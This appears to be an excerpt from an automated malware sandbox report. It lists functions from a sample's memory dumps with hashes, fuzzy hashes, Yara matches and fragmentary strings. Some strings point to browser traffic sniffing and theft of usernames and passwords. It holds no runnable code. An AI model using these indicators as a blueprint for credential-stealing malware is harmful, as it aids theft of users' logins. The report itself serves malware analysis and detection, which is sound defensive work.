                                  • Instruction ID: 88fb2687b4283e4de7ab13c0464b23944dd84b852dceb0bfe5bf631c42fbecf4
                                  • Opcode Fuzzy Hash: 2d144dca8e2fb9c2f50649e6d365d30c44366d9b7f69b28011654fcc54814e6b
                                  • Instruction Fuzzy Hash: 9C41F7B5EC170876EB34AAA09C47FEF725C9F32704F004845FA09A61C3F6B15F1546A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BC3D9, Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$.dll$WAt$bIW
                                  • API String ID: 0-4102820332
                                  • Opcode ID: 7c560cc7e2c02681750a9b85a02aa0decdae5751a3edaee35c96f4d17eb0b689
                                  • Instruction ID: 4ef966bc4d3d3dbe613e6ab88cf9e138343171d493635964ac94bca11cbc1b7e
                                  • Opcode Fuzzy Hash: 7c560cc7e2c02681750a9b85a02aa0decdae5751a3edaee35c96f4d17eb0b689
                                  • Instruction Fuzzy Hash: E75164B0C092A99EEBA19F559C41BEDBBB4FF16300F0485D9C48CBB205D7782A85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BC3E0, Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$.dll$WAt$bIW
                                  • API String ID: 0-4102820332
                                  • Opcode ID: 0608f076afbe8d2461f32578eb7eae5ce70c0e5e5c01092cc26206d9c6d2c7c0
                                  • Instruction ID: fe06265bd421f3cbec3adfd7abb1911e0868def87ab31888a912e7c71f04b84c
                                  • Opcode Fuzzy Hash: 0608f076afbe8d2461f32578eb7eae5ce70c0e5e5c01092cc26206d9c6d2c7c0
                                  • Instruction Fuzzy Hash: F45145B0C092699EEBA19F559C01BEDBBB8FF16300F0485D9D48CAB205D7782A85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AE650, Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: U$k$n$o
                                  • API String ID: 0-3751959358
                                  • Opcode ID: 67f723e0dffd114e84dd3ef4a22673b72aaab0966a552c5932ba3ff01edbb629
                                  • Instruction ID: f0f59ef564e6853b00c0e2f52298087baf57f172eec9cede191d39336b8c5650
                                  • Opcode Fuzzy Hash: 67f723e0dffd114e84dd3ef4a22673b72aaab0966a552c5932ba3ff01edbb629
                                  • Instruction Fuzzy Hash: 9E41C3B2900308ABD714EFA5DC81FEBB3ADEF84744F00491DF61A97142EBB06604CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A6C50, Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$: $Host
                                  • API String ID: 0-1650409646
                                  • Opcode ID: dd913ecc41eff8d51fe8813a0d4f1e5aed0f663be346b62e59e4bdde96352bf5
                                  • Instruction ID: 522b43910998afbab2555a8b9ae886aac1ee7f8cf79ee3a4069b68888feb10b1
                                  • Opcode Fuzzy Hash: dd913ecc41eff8d51fe8813a0d4f1e5aed0f663be346b62e59e4bdde96352bf5
                                  • Instruction Fuzzy Hash: 594183B6A00209BFDB10DB94DC41EEBB7BCEF45314F084269F90897241D775A945CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AEC30, Relevance: 5.1, Strings: 4, Instructions: 116COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$9$n
                                  • API String ID: 0-1627007382
                                  • Opcode ID: 9a3dfb213f2dad458b4f79167cb1b2953072547b4bcf6fbb17cc0e8ed951bb15
                                  • Instruction ID: 2edb88c1e2bf2fcbed14c2598d603004e67288e3243d1ddb04322c1d93f654ef
                                  • Opcode Fuzzy Hash: 9a3dfb213f2dad458b4f79167cb1b2953072547b4bcf6fbb17cc0e8ed951bb15
                                  • Instruction Fuzzy Hash: CE318471D413097ADB20EFA4DC46BFF73B9EF48310F400559E609A6182EBB4A6418BD5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AB7E9, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: b$o$r$s
                                  • API String ID: 0-1188782201
                                  • Opcode ID: a3e6ca3e66657292ca54a653cb00e7dffbb918835830425abdc5e4fac1499ccd
                                  • Instruction ID: 45a44231663d98c36d7c470119b889e21e86ef7aac2f174a7a8c7ba7cced0bc4
                                  • Opcode Fuzzy Hash: a3e6ca3e66657292ca54a653cb00e7dffbb918835830425abdc5e4fac1499ccd
                                  • Instruction Fuzzy Hash: 64318AB1A403047AF710AFE09C82FEF76ACAF46745F044118FA096E1C3DBF4AA0587A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083FA5, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 81d19808bcf00e6cbc1c6c2dce2e44becfa2d8c9eef35f40c44b73c03c9e7801
                                  • Instruction ID: 421803cb6f67b26763df0ee67609cdc97a189533e3711955d820f1ab7d4c060e
                                  • Opcode Fuzzy Hash: 81d19808bcf00e6cbc1c6c2dce2e44becfa2d8c9eef35f40c44b73c03c9e7801
                                  • Instruction Fuzzy Hash: B4318F30118A488FCB84FF688495BAAB7E1FF94300F94466DA48ACB256DF30D945C756
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AB7F0, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: b$o$r$s
                                  • API String ID: 0-1188782201
                                  • Opcode ID: 5dbe0cc4759df73b6595937657d87d5612d171f59d19fd69a98e49081c071a27
                                  • Instruction ID: 4f39ff446e8faf61103548fcdce188304eb53bcc7facbb5d18514374030d821d
                                  • Opcode Fuzzy Hash: 5dbe0cc4759df73b6595937657d87d5612d171f59d19fd69a98e49081c071a27
                                  • Instruction Fuzzy Hash: D63147B1A403157AF710ABE49C82FEF76ACAF45B45F044118FA096E1C3DBF4AA0587B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000878F9, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 49a2d39a1f7fc53a328d03b08b28b8fb9b416af87dfffea4b9a3cb4d68bc9db9
                                  • Instruction ID: 05717c09b4bed42fb4227ab8ebbabf55201868a44f60999c95f90bfd597dc44c
                                  • Opcode Fuzzy Hash: 49a2d39a1f7fc53a328d03b08b28b8fb9b416af87dfffea4b9a3cb4d68bc9db9
                                  • Instruction Fuzzy Hash: 70319E31518B489FD719EB28C485ADAB7E4FB94300F50491EE4DBC7652EE30AA4ACB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00087902, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: d70b49d62e4495a68a78dc5cc3bb9accdbcdae455e3531e59aee493e38930d30
                                  • Instruction ID: bb18abcd400d1b19f20d23f7ee57912faced3380858d119e254c52483e68de01
                                  • Opcode Fuzzy Hash: d70b49d62e4495a68a78dc5cc3bb9accdbcdae455e3531e59aee493e38930d30
                                  • Instruction Fuzzy Hash: 6C31AF71518B485FD719EB28C485AEAB7E4FB94300F50491EE4DBC7256EE30EA49CB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083FB2, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 3d33631aee1d0a7c566559c7c4113288574d0372d2b061282ffad0d568a1a718
                                  • Instruction ID: 33cc13785055a7a846f3d66c95d0254052c0076e3f24acb1cbec8cd90a17818a
                                  • Opcode Fuzzy Hash: 3d33631aee1d0a7c566559c7c4113288574d0372d2b061282ffad0d568a1a718
                                  • Instruction Fuzzy Hash: F8318270118B488FCB84FF689495BAAB7E1FF94300F94466DA48ECB256DF30D944CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000868B2, Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 8600fe1419c86ee04e4d9b50d85689d97b2880a0dd53235f66170289e1fbba16
                                  • Instruction ID: 1b1a7de3b499bc4a1ebef82e9080475e3e8e5662822d26cc35766be13ce33de7
                                  • Opcode Fuzzy Hash: 8600fe1419c86ee04e4d9b50d85689d97b2880a0dd53235f66170289e1fbba16
                                  • Instruction Fuzzy Hash: 2D319F31614A0C8ADF44FFA8C8857EDB7F1FB58315F40422AE48ED7241DF7496498795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0FB0, Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$/
                                  • API String ID: 0-2899491479
                                  • Opcode ID: f283cb4599e27073f8c9f0fdf8cbc082d5dbebb6db70ea5d03dc3bfc40d4279e
                                  • Instruction ID: eebc5e3781277df4607dd0dce8fba951117554b76f34d1ec8fa25aee3da6093f
                                  • Opcode Fuzzy Hash: f283cb4599e27073f8c9f0fdf8cbc082d5dbebb6db70ea5d03dc3bfc40d4279e
                                  • Instruction Fuzzy Hash: 923141F6C1010C6BDB20EBA49D82EEF777C9F84304F0045A9B615A6103FBB197548BB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000868AE, Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: befc87dc6b55f4520f845e078035f468974c8004e2339b336586b6b91dd7de07
                                  • Instruction ID: 77587e3919e7a6fcbd14ac36c21bf9da875992a3bbadc4257060877ee2421b41
                                  • Opcode Fuzzy Hash: befc87dc6b55f4520f845e078035f468974c8004e2339b336586b6b91dd7de07
                                  • Instruction Fuzzy Hash: 2021DD30610A0C8ACF44FFA8C8857EDBBF1FF68305F40422AE48AE7242DF7496498795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00087832, Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: 4fa7be0676df68f2d1b7c80f8f839babdcf969bdc99cffb02524ee6c014d4097
                                  • Instruction ID: 4bfce4ca6afb8b39c8f2a433d2a0c04531e27e24905ae6a1c0707b7186f8973a
                                  • Opcode Fuzzy Hash: 4fa7be0676df68f2d1b7c80f8f839babdcf969bdc99cffb02524ee6c014d4097
                                  • Instruction Fuzzy Hash: 31219D3061470D8BCB45EF9998816EEBBF1FF88344F014619A84AEB245EAB4D914CBC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A7F60, Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [$m$t$y
                                  • API String ID: 0-3854059060
                                  • Opcode ID: 2c983a2be753bbdc4df410f2d3f03d3bd2174172f78c6d64daacc53e50367e5b
                                  • Instruction ID: b54d1c960fc297590358a32deb0aec1ba875de420ab7d6100a0355859fadb9d8
                                  • Opcode Fuzzy Hash: 2c983a2be753bbdc4df410f2d3f03d3bd2174172f78c6d64daacc53e50367e5b
                                  • Instruction Fuzzy Hash: F721CF719007049FC724DF99D4449EBBBF9EF88300F10866EE84A9B312E7B1EA458BD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AB400, Relevance: 5.1, Strings: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: g$i$i$l
                                  • API String ID: 0-114883354
                                  • Opcode ID: eec7d1c55a0e4de6406663a6d7135473425ca929085cfa161fd6c787d1bae6ad
                                  • Instruction ID: 6c1a12f50ac9f4c82f2a07e171fc1840e2b3ca8ddc78d21e4110c36fcc7751e2
                                  • Opcode Fuzzy Hash: eec7d1c55a0e4de6406663a6d7135473425ca929085cfa161fd6c787d1bae6ad
                                  • Instruction Fuzzy Hash: 3B110D71D11218AFDB20AFA99C46BEF7AADEF45700F000419E905A6242EBB566108BA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008654A, Relevance: 5.1, Strings: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: -Age$H$User$nt:
                                  • API String ID: 0-1844531148
                                  • Opcode ID: da13ddc7ef056d3fc01d8973de82151a16319e260bacc5f0c03b9e34ca5daa9c
                                  • Instruction ID: 6113b96290ec9b6c9998ee89b6154de2dddb292a884e16e7bf100761e167951f
                                  • Opcode Fuzzy Hash: da13ddc7ef056d3fc01d8973de82151a16319e260bacc5f0c03b9e34ca5daa9c
                                  • Instruction Fuzzy Hash: 4711CE70509A488FD784EF18C449B69FBE0FB69304F16059DD899CB222D775D9418B82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AB3F8, Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: g$i$i$l
                                  • API String ID: 0-114883354
                                  • Opcode ID: cb44c041528f507862f9ae93e91310600d7b9fb2b3c4e18059d89d04f1f939c9
                                  • Instruction ID: 05dc0da78ca0422d34a333c688d1b9f17134433b2c81797c083c4a7d46201fd7
                                  • Opcode Fuzzy Hash: cb44c041528f507862f9ae93e91310600d7b9fb2b3c4e18059d89d04f1f939c9
                                  • Instruction Fuzzy Hash: 8911AFB0D00218AFDB20EFA4DC46BEF7BBCEF45300F000029E915A7283E7B556108BA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A7F58, Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [$m$t$y
                                  • API String ID: 0-3854059060
                                  • Opcode ID: 78b4a691879059502f469795aebc676764345128611b85565bf174e5231d829b
                                  • Instruction ID: a4cc5eed7069f3c82c5727cc62b16f5718852997786f97aeb8bd7b232a8f9849
                                  • Opcode Fuzzy Hash: 78b4a691879059502f469795aebc676764345128611b85565bf174e5231d829b
                                  • Instruction Fuzzy Hash: 9F11BE749047049FC724CF5AD44499BBBF6FF88310B10C66EE84A8B721E7B1E905CB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BCA50, Relevance: 5.0, Strings: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$A$I$M
                                  • API String ID: 0-1664541526
                                  • Opcode ID: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                  • Instruction ID: d686c0815dad119842ccbef62b661499c358b0408bcdce50622aafbe2d8bc8bc
                                  • Opcode Fuzzy Hash: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                  • Instruction Fuzzy Hash: 3EF08975D0021CBBEB10DA94AC45BFD7BECEB04318F4041A6FD08A6242E7F15E5887D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%